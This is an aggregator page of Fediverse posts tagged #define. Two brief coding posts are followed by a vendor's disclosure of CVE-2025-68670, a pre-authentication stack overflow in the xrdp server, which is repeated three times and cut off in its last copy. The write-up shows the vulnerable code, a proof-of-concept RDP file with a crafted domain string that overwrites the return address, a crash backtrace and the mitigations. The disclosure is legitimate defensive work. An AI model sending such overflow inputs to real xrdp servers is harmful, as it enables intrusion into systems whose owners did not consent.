#define — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #define, aggregated by home.social.
-
It's a bit annoying that the version macro was not there from the beginning. If you don't ship an openxr.h with your source code, I'd recommend putting something like this in your code:
```
#ifndef XR_API_VERSION_1_0
#define XR_API_VERSION_1_0 XR_MAKE_VERSION(1, 0, XR_VERSION_PATCH(XR_CURRENT_API_VERSION))
#endif
``` -
What's pretty neat is that I have http://wesl-lang.dev with its module system now! That means I can trivially consume https://lygia.xyz now :)
I'm also finding some interesting metaprogramming techniques between #alv and the modules, like basic polymorphism in this raymarching library:
pic one is the user code, pic two is the library implementation.
First the user declares the scene sample type they want to use by defining a shader module that contains a "Sample" type, an intial value, and a helper function that extracts the "distance" float from that type. This means they have complete autonomy over what material data they need (e.g. meterial identifiers, surface UVs, or whatever else).
That shader module can be passed to an alive function that returns another shader module that implements common distance field operations (union, difference etc) on top of these primitives.
Now the user can define a second shader module that contains the scene function (using the SDF utils), and give that back to the library which uses it to provide "castRay" and "calcNormal", which the primary user module can include to render the scene.
Unlike GLSL #define-type approaches, you could even instantiate multiple scenes with different result types if you wanted to
-
CVE-2025-68670: discovering an RCE vulnerability in xrdp
In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, such as flash drives, tokens, smart cards, and printers, within a remote desktop session – all while maintaining connection security.
We take the security of our products seriously and regularly conduct security assessments. Kaspersky USB Redirector is no exception. Last year, during a security audit of this tool, we discovered a remote code execution vulnerability in the xrdp server, which was assigned the identifier CVE-2025-68670. We reported our findings to the project maintainers, who responded quickly: they fixed the vulnerability in version 0.10.5, backported the patch to versions 0.9.27 and 0.10.4.1, and issued a security bulletin. This post breaks down the details of CVE-2025-68670 and provides recommendations for staying protected.
Client data transmission via RDP
Establishing an RDP connection is a complex, multi-stage process where the client and server exchange various settings. In the context of the vulnerability we discovered, we are specifically interested in the Secure Settings Exchange, which occurs immediately before client authentication. At this stage, the client sends protected credentials to the server within a Client Info PDU (protocol data unit with client info): username, password, auto-reconnect cookies, and so on. These data points are bundled into a TS_INFO_PACKET structure and can be represented as Unicode strings up to 512 bytes long, the last of which must be a null terminator. In the xrdp code, this corresponds to the xrdp_client_info structure, which looks as follows:
{
[..SNIP..]
char username[INFO_CLIENT_MAX_CB_LEN];
char password[INFO_CLIENT_MAX_CB_LEN];
char domain[INFO_CLIENT_MAX_CB_LEN];
char program[INFO_CLIENT_MAX_CB_LEN];
char directory[INFO_CLIENT_MAX_CB_LEN];
[..SNIP..]
}
The value of the INFO_CLIENT_MAX_CB_LEN constant corresponds to the maximum string length and is defined as follows:
#define INFO_CLIENT_MAX_CB_LEN 512
When transmitting Unicode data, the client uses the UTF-16 encoding. However, the server converts the data to UTF-8 before saving it.
if (ts_info_utf16_in( //
[1] s, len_domain, self->rdp_layer->client_info.domain, sizeof(self->rdp_layer->client_info.domain)) != 0) //
[2]{
[..SNIP..]
}
The size of the buffer for unpacking the domain name in UTF-8 [2] is passed to the ts_info_utf16_in function [1], which implements buffer overflow protection [3].
static int ts_info_utf16_in(struct stream *s, int src_bytes, char *dst, int dst_len)
{
int rv = 0;
LOG_DEVEL(LOG_LEVEL_TRACE, "ts_info_utf16_in: uni_len %d, dst_len %d", src_bytes, dst_len);
if (!s_check_rem_and_log(s, src_bytes + 2, "ts_info_utf16_in"))
{
rv = 1;
}
else
{
int term;
int num_chars = in_utf16_le_fixed_as_utf8(s, src_bytes / 2,
dst, dst_len);
if (num_chars > dst_len) //
[3] {
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: output buffer overflow"); rv = 1;
}
/ / String should be null-terminated. We haven't read the terminator yet
in_uint16_le(s, term);
if (term != 0)
{
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: bad terminator. Expected 0, got %d", term);
rv = 1;
}
}
return rv;
}
Next, the in_utf16_le_fixed_as_utf8_proc function, where the actual data conversion from UTF-16 to UTF-8 takes place, checks the number of bytes written [4] as well as whether the string is null-terminated [5].
{
unsigned int rv = 0;
char32_t c32;
char u8str[MAXLEN_UTF8_CHAR];
unsigned int u8len;
char *saved_s_end = s->end;// Expansion of S_CHECK_REM(s, n*2) using passed-in file and line #ifdef USE_DEVEL_STREAMCHECK
parser_stream_overflow_check(s, n * 2, 0, file, line); #endif
// Temporarily set the stream end pointer to allow us to use
// s_check_rem() when reading in UTF-16 words
if (s->end - s->p > (int)(n * 2))
{
s->end = s->p + (int)(n * 2);
}while (s_check_rem(s, 2))
{
c32 = get_c32_from_stream(s);
u8len = utf_char32_to_utf8(c32, u8str);
if (u8len + 1 <= vn) //
[4] {
/* Room for this character and a terminator. Add the character */
unsigned int i;
for (i = 0 ; i < u8len ; ++i)
{
v[i] = u8str[i];
}v n -= u8len;
v += u8len;
}else if (vn > 1)
{
/* We've skipped a character, but there's more than one byte
* remaining in the output buffer. Mark the output buffer as
* full so we don't get a smaller character being squeezed into
* the remaining space */
vn = 1;
}r v += u8len;
}
// Restore stream to full length s->end = saved_s_end;
if (vn > 0)
{
*v = '\0'; //
[5] }
+ +rv;
return rv;
}
Consequently, up to 512 bytes of input data in UTF-16 are converted into UTF-8 data, which can also reach a size of up to 512 bytes.CVE-2025-68670: an RCE vulnerability in xrdp
The vulnerability exists within the xrdp_wm_parse_domain_information function, which processes the domain name saved on the server in UTF-8. Like the functions described above, this one is called before client authentication, meaning exploitation does not require valid credentials. The call stack below illustrates this.
x rdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
xrdp_login_wnd_create(struct xrdp_wm *self)
xrdp_wm_init(struct xrdp_wm *self)
xrdp_wm_login_state_changed(struct xrdp_wm *self)
xrdp_wm_check_wait_objs(struct xrdp_wm *self)
xrdp_process_main_loop(struct xrdp_process *self)
The code snippet where the vulnerable function is called looks like this:
char resultIP[256]; //
[7][..SNIP..]
combo->item_index = xrdp_wm_parse_domain_information(
self->session->client_info->domain, //
[6] combo->data_list->count, 1,
resultIP /* just a dummy place holder, we ignore
*/ );
As you can see, the first argument of the function in line [6] is the domain name up to 512 bytes long. The final argument is the resultIP buffer of 256 bytes (as seen in line [7]). Now, let’s look at exactly what the vulnerable function does with these arguments.
static int
xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
{
int ret;
int pos;
int comboxindex;
char index[2];/* If the first char in the domain name is '_' we use the domain name as IP*/
ret = 0; /* default return value */
/* resultBuffer assumed to be 256 chars */
g_memset(resultBuffer, 0, 256);
if (originalDomainInfo[0] == '_') //
[8] {
/* we try to locate a number indicating what combobox index the user
* prefer the information is loaded from domain field, from the client
* We must use valid chars in the domain name.
* Underscore is a valid name in the domain.
* Invalid chars are ignored in microsoft client therefore we use '_'
* again. this sec '__' contains the split for index.*/
pos = g_pos(&originalDomainInfo[1], "__"); //
[9] if (pos > 0)
{
/* an index is found we try to use it */
LOG(LOG_LEVEL_DEBUG, "domain contains index char __");
if (decode)
{
[..SNIP..]
}
/ * pos limit the String to only contain the IP */
g_strncpy(resultBuffer, &originalDomainInfo[1], pos); //
[10] }
else
{
LOG(LOG_LEVEL_DEBUG, "domain does not contain _");
g_strncpy(resultBuffer, &originalDomainInfo[1], 255);
}
}
return ret;
}
As seen in the code, if the first character of the domain name is an underscore (line [8]), a portion of the domain name – starting from the second character and ending with the double underscore (“__”) – is written into the resultIP buffer (line [9]). Since the domain name can be up to 512 bytes long, it may not fit into the buffer even if it’s technically well-formed (line [10]). Consequently, the overflow data will be written to the thread stack, potentially modifying the return address. If an attacker crafts a domain name that overflows the stack buffer and replaces the return address with a value they control, execution flow will shift according to the attacker’s intent upon returning from the vulnerable function, allowing for arbitrary code execution within the context of the compromised process (in this case, the xrdp server).To exploit this vulnerability, the attacker simply needs to specify a domain name that, after being converted to UTF-8, contains more than 256 bytes between the initial “_” and the subsequent “__”. Given that the conversion follows specific rules easily found online, this is a straightforward task: one can simply take advantage of the fact that the length of the same string can vary between UTF-16 and UTF-8. In short, this involves avoiding ASCII and certain other characters that may take up more space in UTF-16 than in UTF-8, while also being careful not to abuse characters that expand significantly after conversion. If the resulting UTF-8 domain name exceeds the 512-byte limit, a conversion error will occur.
PoC
As a PoC for the discovered vulnerability, we created the following RDP file containing the RDP server’s IP address and a long domain name designed to trigger a buffer overflow. In the domain name, we used a specific number of K (U+041A) characters to overwrite the return address with the string “AAAAAAAA”. The contents of the RDP file are shown below:
alternate full address:s:172.22.118.7
full address:s:172.22.118.7
domain:s:_veryveryveryverKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKeryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveaaaaaaaaryveryveryveryveryveryveryveryveryveryveryveryverylongdoAAAAAAAA__0
username:s:testuser
When you open this file, the mstsc.exe process connects to the specified server. The server processes the data in the file and attempts to write the domain name into the buffer, which results in a buffer overflow and the overwriting of the return address. If you look at the xrdp memory dump at the time of the crash, you can see that both the buffer and the return address have been overwritten. The application terminates during the stack canary check. The example below was captured using the gdb debugger.
gef➤ bt
#0 __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:44
#1 __pthread_kill_internal (signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:78
#2 __GI___pthread_kill (threadid=0x7adb2dc71740, signo=signo@entry=0x6) at./nptl/pthread_kill.c:89
#3 0x00007adb2da42476 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/posix/raise.c:26
#4 0x00007adb2da287f3 in __GI_abort () at ./stdlib/abort.c:79
#5 0x00007adb2da89677 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7adb2dbdb92e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:156
#6 0x00007adb2db3660a in __GI___fortify_fail (msg=msg@entry=0x7adb2dbdb916 "stack smashing detected") at ./debug/fortify_fail.c:26
#7 0x00007adb2db365d6 in __stack_chk_fail () at ./debug/stack_chk_fail.c:24
#8 0x000063654a2e5ad5 in ?? ()
#9 0x4141414141414141 in ?? ()
#10 0x00007adb00000a00 in ?? ()
#11 0x0000000000050004 in ?? ()
#12 0x00007fff91732220 in ?? ()
#13 0x000000000000030a in ?? ()
#14 0xfffffffffffffff8 in ?? ()
#15 0x000000052dc71740 in ?? ()
#16 0x3030305f70647278 in ?? ()
#17 0x616d5f6130333030 in ?? ()
#18 0x00636e79735f6e69 in ?? ()
#19 0x0000000000000000 in ?? ()Protection against vulnerability exploitation
It is worth noting that the vulnerable function can be protected by a stack canary via compiler settings. In most compilers, this option is enabled by default, which prevents an attacker from simply overwriting the return address and executing a ROP chain. To successfully exploit the vulnerability, the attacker would first need to obtain the canary value.The vulnerable function is also referenced by the xrdp_wm_show_edits function; however, even in that case, if the code is compiled with secure settings (using stack canaries), the most trivial exploitation scenario remains unfeasible.
Nevertheless, a stack canary is not a panacea. An attacker could potentially leak or guess its value, allowing them to overwrite the buffer and the return address while leaving the canary itself unchanged. In the security bulletin dedicated to CVE-2025-68670, the xrdp maintainers advise against relying solely on stack canaries when using the project.
Vulnerability remediation timeline
- 12/05/2025: we submitted the vulnerability report via github.com/neutrinolabs/xrdp/s…
- 12/05/2025: the project maintainers immediately confirmed receipt of the report and stated they would review it shortly.
- 12/15/2025: investigation and prioritization of the vulnerability began.
- 12/18/2025: the maintainers confirmed the vulnerability and began developing a patch.
- 12/24/2025: the vulnerability was assigned the identifier CVE-2025-68670.
- 01/27/2026: the patch was merged into the project’s main branch.
Conclusion
Taking a responsible approach to code makes not only our own products more solid but also enhances popular open-source projects. We have previously shared how security assessments of KasperskyOS-based solutions – such as Kaspersky Thin Client and Kaspersky IoT Secure Gateway – led to the discovery of several vulnerabilities in Suricata and FreeRDP, which project maintainers quickly patched. CVE-2025-68670 is yet another one of those stories.However, discovering a vulnerability is only half the battle. We would like to thank the xrdp maintainers for their rapid response to our report, for fixing the vulnerability, and for issuing a security bulletin detailing the issue and risk mitigation options.
-
CVE-2025-68670: discovering an RCE vulnerability in xrdp
In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, such as flash drives, tokens, smart cards, and printers, within a remote desktop session – all while maintaining connection security.
We take the security of our products seriously and regularly conduct security assessments. Kaspersky USB Redirector is no exception. Last year, during a security audit of this tool, we discovered a remote code execution vulnerability in the xrdp server, which was assigned the identifier CVE-2025-68670. We reported our findings to the project maintainers, who responded quickly: they fixed the vulnerability in version 0.10.5, backported the patch to versions 0.9.27 and 0.10.4.1, and issued a security bulletin. This post breaks down the details of CVE-2025-68670 and provides recommendations for staying protected.
Client data transmission via RDP
Establishing an RDP connection is a complex, multi-stage process where the client and server exchange various settings. In the context of the vulnerability we discovered, we are specifically interested in the Secure Settings Exchange, which occurs immediately before client authentication. At this stage, the client sends protected credentials to the server within a Client Info PDU (protocol data unit with client info): username, password, auto-reconnect cookies, and so on. These data points are bundled into a TS_INFO_PACKET structure and can be represented as Unicode strings up to 512 bytes long, the last of which must be a null terminator. In the xrdp code, this corresponds to the xrdp_client_info structure, which looks as follows:
{
[..SNIP..]
char username[INFO_CLIENT_MAX_CB_LEN];
char password[INFO_CLIENT_MAX_CB_LEN];
char domain[INFO_CLIENT_MAX_CB_LEN];
char program[INFO_CLIENT_MAX_CB_LEN];
char directory[INFO_CLIENT_MAX_CB_LEN];
[..SNIP..]
}
The value of the INFO_CLIENT_MAX_CB_LEN constant corresponds to the maximum string length and is defined as follows:
#define INFO_CLIENT_MAX_CB_LEN 512
When transmitting Unicode data, the client uses the UTF-16 encoding. However, the server converts the data to UTF-8 before saving it.
if (ts_info_utf16_in( //
[1] s, len_domain, self->rdp_layer->client_info.domain, sizeof(self->rdp_layer->client_info.domain)) != 0) //
[2]{
[..SNIP..]
}
The size of the buffer for unpacking the domain name in UTF-8 [2] is passed to the ts_info_utf16_in function [1], which implements buffer overflow protection [3].
static int ts_info_utf16_in(struct stream *s, int src_bytes, char *dst, int dst_len)
{
int rv = 0;
LOG_DEVEL(LOG_LEVEL_TRACE, "ts_info_utf16_in: uni_len %d, dst_len %d", src_bytes, dst_len);
if (!s_check_rem_and_log(s, src_bytes + 2, "ts_info_utf16_in"))
{
rv = 1;
}
else
{
int term;
int num_chars = in_utf16_le_fixed_as_utf8(s, src_bytes / 2,
dst, dst_len);
if (num_chars > dst_len) //
[3] {
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: output buffer overflow"); rv = 1;
}
/ / String should be null-terminated. We haven't read the terminator yet
in_uint16_le(s, term);
if (term != 0)
{
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: bad terminator. Expected 0, got %d", term);
rv = 1;
}
}
return rv;
}
Next, the in_utf16_le_fixed_as_utf8_proc function, where the actual data conversion from UTF-16 to UTF-8 takes place, checks the number of bytes written [4] as well as whether the string is null-terminated [5].
{
unsigned int rv = 0;
char32_t c32;
char u8str[MAXLEN_UTF8_CHAR];
unsigned int u8len;
char *saved_s_end = s->end;// Expansion of S_CHECK_REM(s, n*2) using passed-in file and line #ifdef USE_DEVEL_STREAMCHECK
parser_stream_overflow_check(s, n * 2, 0, file, line); #endif
// Temporarily set the stream end pointer to allow us to use
// s_check_rem() when reading in UTF-16 words
if (s->end - s->p > (int)(n * 2))
{
s->end = s->p + (int)(n * 2);
}while (s_check_rem(s, 2))
{
c32 = get_c32_from_stream(s);
u8len = utf_char32_to_utf8(c32, u8str);
if (u8len + 1 <= vn) //
[4] {
/* Room for this character and a terminator. Add the character */
unsigned int i;
for (i = 0 ; i < u8len ; ++i)
{
v[i] = u8str[i];
}v n -= u8len;
v += u8len;
}else if (vn > 1)
{
/* We've skipped a character, but there's more than one byte
* remaining in the output buffer. Mark the output buffer as
* full so we don't get a smaller character being squeezed into
* the remaining space */
vn = 1;
}r v += u8len;
}
// Restore stream to full length s->end = saved_s_end;
if (vn > 0)
{
*v = '\0'; //
[5] }
+ +rv;
return rv;
}
Consequently, up to 512 bytes of input data in UTF-16 are converted into UTF-8 data, which can also reach a size of up to 512 bytes.CVE-2025-68670: an RCE vulnerability in xrdp
The vulnerability exists within the xrdp_wm_parse_domain_information function, which processes the domain name saved on the server in UTF-8. Like the functions described above, this one is called before client authentication, meaning exploitation does not require valid credentials. The call stack below illustrates this.
x rdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
xrdp_login_wnd_create(struct xrdp_wm *self)
xrdp_wm_init(struct xrdp_wm *self)
xrdp_wm_login_state_changed(struct xrdp_wm *self)
xrdp_wm_check_wait_objs(struct xrdp_wm *self)
xrdp_process_main_loop(struct xrdp_process *self)
The code snippet where the vulnerable function is called looks like this:
char resultIP[256]; //
[7][..SNIP..]
combo->item_index = xrdp_wm_parse_domain_information(
self->session->client_info->domain, //
[6] combo->data_list->count, 1,
resultIP /* just a dummy place holder, we ignore
*/ );
As you can see, the first argument of the function in line [6] is the domain name up to 512 bytes long. The final argument is the resultIP buffer of 256 bytes (as seen in line [7]). Now, let’s look at exactly what the vulnerable function does with these arguments.
static int
xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
{
int ret;
int pos;
int comboxindex;
char index[2];/* If the first char in the domain name is '_' we use the domain name as IP*/
ret = 0; /* default return value */
/* resultBuffer assumed to be 256 chars */
g_memset(resultBuffer, 0, 256);
if (originalDomainInfo[0] == '_') //
[8] {
/* we try to locate a number indicating what combobox index the user
* prefer the information is loaded from domain field, from the client
* We must use valid chars in the domain name.
* Underscore is a valid name in the domain.
* Invalid chars are ignored in microsoft client therefore we use '_'
* again. this sec '__' contains the split for index.*/
pos = g_pos(&originalDomainInfo[1], "__"); //
[9] if (pos > 0)
{
/* an index is found we try to use it */
LOG(LOG_LEVEL_DEBUG, "domain contains index char __");
if (decode)
{
[..SNIP..]
}
/ * pos limit the String to only contain the IP */
g_strncpy(resultBuffer, &originalDomainInfo[1], pos); //
[10] }
else
{
LOG(LOG_LEVEL_DEBUG, "domain does not contain _");
g_strncpy(resultBuffer, &originalDomainInfo[1], 255);
}
}
return ret;
}
As seen in the code, if the first character of the domain name is an underscore (line [8]), a portion of the domain name – starting from the second character and ending with the double underscore (“__”) – is written into the resultIP buffer (line [9]). Since the domain name can be up to 512 bytes long, it may not fit into the buffer even if it’s technically well-formed (line [10]). Consequently, the overflow data will be written to the thread stack, potentially modifying the return address. If an attacker crafts a domain name that overflows the stack buffer and replaces the return address with a value they control, execution flow will shift according to the attacker’s intent upon returning from the vulnerable function, allowing for arbitrary code execution within the context of the compromised process (in this case, the xrdp server).To exploit this vulnerability, the attacker simply needs to specify a domain name that, after being converted to UTF-8, contains more than 256 bytes between the initial “_” and the subsequent “__”. Given that the conversion follows specific rules easily found online, this is a straightforward task: one can simply take advantage of the fact that the length of the same string can vary between UTF-16 and UTF-8. In short, this involves avoiding ASCII and certain other characters that may take up more space in UTF-16 than in UTF-8, while also being careful not to abuse characters that expand significantly after conversion. If the resulting UTF-8 domain name exceeds the 512-byte limit, a conversion error will occur.
PoC
As a PoC for the discovered vulnerability, we created the following RDP file containing the RDP server’s IP address and a long domain name designed to trigger a buffer overflow. In the domain name, we used a specific number of K (U+041A) characters to overwrite the return address with the string “AAAAAAAA”. The contents of the RDP file are shown below:
alternate full address:s:172.22.118.7
full address:s:172.22.118.7
domain:s:_veryveryveryverKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKeryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveaaaaaaaaryveryveryveryveryveryveryveryveryveryveryveryverylongdoAAAAAAAA__0
username:s:testuser
When you open this file, the mstsc.exe process connects to the specified server. The server processes the data in the file and attempts to write the domain name into the buffer, which results in a buffer overflow and the overwriting of the return address. If you look at the xrdp memory dump at the time of the crash, you can see that both the buffer and the return address have been overwritten. The application terminates during the stack canary check. The example below was captured using the gdb debugger.
gef➤ bt
#0 __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:44
#1 __pthread_kill_internal (signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:78
#2 __GI___pthread_kill (threadid=0x7adb2dc71740, signo=signo@entry=0x6) at./nptl/pthread_kill.c:89
#3 0x00007adb2da42476 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/posix/raise.c:26
#4 0x00007adb2da287f3 in __GI_abort () at ./stdlib/abort.c:79
#5 0x00007adb2da89677 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7adb2dbdb92e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:156
#6 0x00007adb2db3660a in __GI___fortify_fail (msg=msg@entry=0x7adb2dbdb916 "stack smashing detected") at ./debug/fortify_fail.c:26
#7 0x00007adb2db365d6 in __stack_chk_fail () at ./debug/stack_chk_fail.c:24
#8 0x000063654a2e5ad5 in ?? ()
#9 0x4141414141414141 in ?? ()
#10 0x00007adb00000a00 in ?? ()
#11 0x0000000000050004 in ?? ()
#12 0x00007fff91732220 in ?? ()
#13 0x000000000000030a in ?? ()
#14 0xfffffffffffffff8 in ?? ()
#15 0x000000052dc71740 in ?? ()
#16 0x3030305f70647278 in ?? ()
#17 0x616d5f6130333030 in ?? ()
#18 0x00636e79735f6e69 in ?? ()
#19 0x0000000000000000 in ?? ()Protection against vulnerability exploitation
It is worth noting that the vulnerable function can be protected by a stack canary via compiler settings. In most compilers, this option is enabled by default, which prevents an attacker from simply overwriting the return address and executing a ROP chain. To successfully exploit the vulnerability, the attacker would first need to obtain the canary value.The vulnerable function is also referenced by the xrdp_wm_show_edits function; however, even in that case, if the code is compiled with secure settings (using stack canaries), the most trivial exploitation scenario remains unfeasible.
Nevertheless, a stack canary is not a panacea. An attacker could potentially leak or guess its value, allowing them to overwrite the buffer and the return address while leaving the canary itself unchanged. In the security bulletin dedicated to CVE-2025-68670, the xrdp maintainers advise against relying solely on stack canaries when using the project.
Vulnerability remediation timeline
- 12/05/2025: we submitted the vulnerability report via github.com/neutrinolabs/xrdp/s…
- 12/05/2025: the project maintainers immediately confirmed receipt of the report and stated they would review it shortly.
- 12/15/2025: investigation and prioritization of the vulnerability began.
- 12/18/2025: the maintainers confirmed the vulnerability and began developing a patch.
- 12/24/2025: the vulnerability was assigned the identifier CVE-2025-68670.
- 01/27/2026: the patch was merged into the project’s main branch.
Conclusion
Taking a responsible approach to code makes not only our own products more solid but also enhances popular open-source projects. We have previously shared how security assessments of KasperskyOS-based solutions – such as Kaspersky Thin Client and Kaspersky IoT Secure Gateway – led to the discovery of several vulnerabilities in Suricata and FreeRDP, which project maintainers quickly patched. CVE-2025-68670 is yet another one of those stories.However, discovering a vulnerability is only half the battle. We would like to thank the xrdp maintainers for their rapid response to our report, for fixing the vulnerability, and for issuing a security bulletin detailing the issue and risk mitigation options.
-
CVE-2025-68670: discovering an RCE vulnerability in xrdp
In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, such as flash drives, tokens, smart cards, and printers, within a remote desktop session – all while maintaining connection security.
We take the security of our products seriously and regularly conduct security assessments. Kaspersky USB Redirector is no exception. Last year, during a security audit of this tool, we discovered a remote code execution vulnerability in the xrdp server, which was assigned the identifier CVE-2025-68670. We reported our findings to the project maintainers, who responded quickly: they fixed the vulnerability in version 0.10.5, backported the patch to versions 0.9.27 and 0.10.4.1, and issued a security bulletin. This post breaks down the details of CVE-2025-68670 and provides recommendations for staying protected.
Client data transmission via RDP
Establishing an RDP connection is a complex, multi-stage process where the client and server exchange various settings. In the context of the vulnerability we discovered, we are specifically interested in the Secure Settings Exchange, which occurs immediately before client authentication. At this stage, the client sends protected credentials to the server within a Client Info PDU (protocol data unit with client info): username, password, auto-reconnect cookies, and so on. These data points are bundled into a TS_INFO_PACKET structure and can be represented as Unicode strings up to 512 bytes long, the last of which must be a null terminator. In the xrdp code, this corresponds to the xrdp_client_info structure, which looks as follows:
{
[..SNIP..]
char username[INFO_CLIENT_MAX_CB_LEN];
char password[INFO_CLIENT_MAX_CB_LEN];
char domain[INFO_CLIENT_MAX_CB_LEN];
char program[INFO_CLIENT_MAX_CB_LEN];
char directory[INFO_CLIENT_MAX_CB_LEN];
[..SNIP..]
}
The value of the INFO_CLIENT_MAX_CB_LEN constant corresponds to the maximum string length and is defined as follows:
#define INFO_CLIENT_MAX_CB_LEN 512
When transmitting Unicode data, the client uses the UTF-16 encoding. However, the server converts the data to UTF-8 before saving it.
if (ts_info_utf16_in( //
[1] s, len_domain, self->rdp_layer->client_info.domain, sizeof(self->rdp_layer->client_info.domain)) != 0) //
[2]{
[..SNIP..]
}
The size of the buffer for unpacking the domain name in UTF-8 [2] is passed to the ts_info_utf16_in function [1], which implements buffer overflow protection [3].
static int ts_info_utf16_in(struct stream *s, int src_bytes, char *dst, int dst_len)
{
int rv = 0;
LOG_DEVEL(LOG_LEVEL_TRACE, "ts_info_utf16_in: uni_len %d, dst_len %d", src_bytes, dst_len);
if (!s_check_rem_and_log(s, src_bytes + 2, "ts_info_utf16_in"))
{
rv = 1;
}
else
{
int term;
int num_chars = in_utf16_le_fixed_as_utf8(s, src_bytes / 2,
dst, dst_len);
if (num_chars > dst_len) //
[3] {
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: output buffer overflow"); rv = 1;
}
/ / String should be null-terminated. We haven't read the terminator yet
in_uint16_le(s, term);
if (term != 0)
{
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: bad terminator. Expected 0, got %d", term);
rv = 1;
}
}
return rv;
}
Next, the in_utf16_le_fixed_as_utf8_proc function, where the actual data conversion from UTF-16 to UTF-8 takes place, checks the number of bytes written [4] as well as whether the string is null-terminated [5].
{
unsigned int rv = 0;
char32_t c32;
char u8str[MAXLEN_UTF8_CHAR];
unsigned int u8len;
char *saved_s_end = s->end;// Expansion of S_CHECK_REM(s, n*2) using passed-in file and line #ifdef USE_DEVEL_STREAMCHECK
parser_stream_overflow_check(s, n * 2, 0, file, line); #endif
// Temporarily set the stream end pointer to allow us to use
// s_check_rem() when reading in UTF-16 words
if (s->end - s->p > (int)(n * 2))
{
s->end = s->p + (int)(n * 2);
}while (s_check_rem(s, 2))
{
c32 = get_c32_from_stream(s);
u8len = utf_char32_to_utf8(c32, u8str);
if (u8len + 1 <= vn) //
[4] {
/* Room for this character and a terminator. Add the character */
unsigned int i;
for (i = 0 ; i < u8len ; ++i)
{
v[i] = u8str[i];
}v n -= u8len;
v += u8len;
}else if (vn > 1)
{
/* We've skipped a character, but there's more than one byte
* remaining in the output buffer. Mark the output buffer as
* full so we don't get a smaller character being squeezed into
* the remaining space */
vn = 1;
}r v += u8len;
}
// Restore stream to full length s->end = saved_s_end;
if (vn > 0)
{
*v = '\0'; //
[5] }
+ +rv;
return rv;
}
Consequently, up to 512 bytes of input data in UTF-16 are converted into UTF-8 data, which can also reach a size of up to 512 bytes.CVE-2025-68670: an RCE vulnerability in xrdp
The vulnerability exists within the xrdp_wm_parse_domain_information function, which processes the domain name saved on the server in UTF-8. Like the functions described above, this one is called before client authentication, meaning exploitation does not require valid credentials. The call stack below illustrates this.
x rdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
xrdp_login_wnd_create(struct xrdp_wm *self)
xrdp_wm_init(struct xrdp_wm *self)
xrdp_wm_login_state_changed(struct xrdp_wm *self)
xrdp_wm_check_wait_objs(struct xrdp_wm *self)
xrdp_process_main_loop(struct xrdp_process *self)
The code snippet where the vulnerable function is called looks like this:
char resultIP[256]; //
[7][..SNIP..]
combo->item_index = xrdp_wm_parse_domain_information(
self->session->client_info->domain, //
[6] combo->data_list->count, 1,
resultIP /* just a dummy place holder, we ignore
*/ );
As you can see, the first argument of the function in line [6] is the domain name up to 512 bytes long. The final argument is the resultIP buffer of 256 bytes (as seen in line [7]). Now, let’s look at exactly what the vulnerable function does with these arguments.
static int
xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
{
int ret;
int pos;
int comboxindex;
char index[2];/* If the first char in the domain name is '_' we use the domain name as IP*/
ret = 0; /* default return value */
/* resultBuffer assumed to be 256 chars */
g_memset(resultBuffer, 0, 256);
if (originalDomainInfo[0] == '_') //
[8] {
/* we try to locate a number indicating what combobox index the user
* prefer the information is loaded from domain field, from the client
* We must use valid chars in the domain name.
* Underscore is a valid name in the domain.
* Invalid chars are ignored in microsoft client therefore we use '_'
* again. this sec '__' contains the split for index.*/
pos = g_pos(&originalDomainInfo[1], "__"); //
[9] if (pos > 0)
{
/* an index is found we try to use it */
LOG(LOG_LEVEL_DEBUG, "domain contains index char __");
if (decode)
{
[..SNIP..]
}
/ * pos limit the String to only contain the IP */
g_strncpy(resultBuffer, &originalDomainInfo[1], pos); //
[10] }
else
{
LOG(LOG_LEVEL_DEBUG, "domain does not contain _");
g_strncpy(resultBuffer, &originalDomainInfo[1], 255);
}
}
return ret;
}
